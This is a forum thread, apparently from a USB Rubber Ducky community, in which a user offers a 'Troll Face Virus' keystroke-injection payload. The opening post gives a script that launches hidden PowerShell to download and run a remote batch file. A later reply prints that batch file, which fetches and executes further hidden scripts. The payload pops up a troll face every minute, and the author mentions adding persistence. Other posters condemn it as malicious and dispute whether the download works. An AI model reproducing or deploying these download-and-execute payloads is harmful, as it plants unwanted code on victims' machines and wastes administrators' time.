Jump to content

[PAYLOAD] Troll Face Virus [FINISHED]


Haxineer1337
 Share

Recommended Posts

[Told you it was coming soon...]

[bROKEN AS OF NOW, MEDIAFIRE HATES ME]

TROLL FACE VIRUS PAYLOAD:

[What it does]:
Runs powershell to wget and execute a bat file that wgets and executes the requirements
[HIDDEN]
Every 60 seconds it loads up your browser if not already opened and opens a troll face.
The only way to remove it is to go to task manager and end cmd.exe and timeout.exe.
Works on windows 7, replace CONTROL ESCAPE with GUI r for it to work with
windows 8 and 7.
Working on startup persistence
SCRIPT:

DELAY 20000
CONTROL ESCAPE
DELAY 1100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat','C:\windowstp.bat'); Start-Process "C:\windowstp.bat"
ENTER

Edited by Haxineer1337
Link to comment
Share on other sites

This is just malicious and all it would do is take up some poor admins time to fix it.

Spreading across a network just exacerbates the problem.

Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone.

Link to comment
Share on other sites

This is just malicious and all it would do is take up some poor admins time to fix it.

Spreading across a network just exacerbates the problem.

Teach people about physical security by demontration, not causing harm to them or interrupting their work flow - that doesn't help anyone.

Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate".

Link to comment
Share on other sites

Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts.

Link to comment
Share on other sites

Then what's the point of having a ducky if you are using it for "demonstration"? I payed 50 dollars for something that makes me laugh, not "demonstrate".

By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others.

Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page..

Don't want to really take sides here, but we should all bear in mind that the USB rubber ducky is first and foremost a script running tool. If we are going to draw lines here, we should bear in mind that even some of the payloads like mine are merely batch and powershell scripts.

I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..

Edited by Xcellerator
Link to comment
Share on other sites

By all means, demonstrate to a person or corporation the risks posed by physical security, but what you're proposing is just causing unnecessary harm and wasting the time of other people. Dunno about you, but I see hacking as way of furthering my own understanding and fixing holes in security - not deliberately using my own knowledge to harm or annoy others.

Also, you obviously haven't tested your script - the download points to mediafire. Try wgetting that, all you get is a html page..

I understand where you're coming from, and there's nothing wrong with payloads that download and run scripts. Its what the script does that's the problem. Changing someones wallpaper or planting a backdoor isn't anything like causing popups every minute - and they're persistent after reboot..

@xcell You obviously haven't tested it either [or been to preschool for that matter], because that, my friend, is a direct download link. It has been fully tested and works 100%. Good day, sir.

PS: Do you really think that pop ups are more dangerous than a backdoor? Back doors let you take full control of their computer. You can delete files, use their webcam, open 100s of web pages, etc.. That interrupts their work flow even more than a pop up powershell that's easy to get rid of.

Edited by Haxineer1337
Link to comment
Share on other sites

How about you try:

wget http://download1585.mediafire.com/3j2upgu7avbg/8runbhhu8fjrjah/Runner1.bat; cat Runner1.bat

and then tell me it works.

I see no reason for you to be offensive (the preschool remark), I've merely given my opinion that I think what you're doing is immoral and not in vein with what (the majority) of this community is about. I also pointed out an actual problem with your script (although I disagree with its purpose, I think that the execution is clever).

Mediafire don't allow direct downloads via links, they want you to go to their site and click the link manually which forwards you around some PHP (or ASP, whatever they use..) to serve up the download. It stops people mass downloading huge files from their servers and clogging up their bandwidth. A better idea would be stick it on pastebin and use the raw link they'll give you (seeing as it's essentially just text files your downloading).

I wrote a ducky script using this technique to add an open wifi network to a windows machine (to autoconnect to the pineapple)

You can see it here if you like: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Pineapple-Assocation-(VERY-FAST)

Backdoors can be used a demonstration of "hey look, in just a few seconds I installed this thing that lets me access all your stuff - you should really fix this so that someone doesn't come along and cause some real damage" - that's what I'd use it for anyway..

Edited by Xcellerator
Link to comment
Share on other sites

Sorry about the preschool remark. I know media fire doesn't allow direct links. I got it by right clicking the download button, selecting inspect element, and finding the link that the button lead you to. I've tested it on another computer and it's worked.

Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file?

Can someone please post the code in a code box? I am in fear of downloading the thing, and accidentally running it, but I want to see it.

@echo off
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs')
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat')
powershell -windowstyle hidden Start-Process "C:\updater.vbs"

This is what the initial bat file is when you download it through mediafire.

Link to comment
Share on other sites

Well, the machines I've tested on (powershell in windows, and wget in linux) both just downloaded a web page. What version of windows did you test on? Can you post a screenshot of the download being successful? As in the powershell command (without the hidden window style bit) and then 'type' the bat file?

@echo off
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1505.mediafire.com/uqxpahdvmi5g/iqgb5774sqcyu7c/updater.vbs','C:\updater.vbs')
powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://download1647.mediafire.com/dhhclv61cblg/gjnalpa67hvpb43/update.bat','C:\update.bat')
powershell -windowstyle hidden Start-Process "C:\updater.vbs"
 
This is what the initial bat file is when you download it through mediafire.

Ok. I will provide screenshots soon.

Link to comment
Share on other sites

Actually there is a code box built into the forums here, looks like a little button with a greater than less than symbol <> . Smack in the center of the buttons at the top of the form. So you can just paste text into it.

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...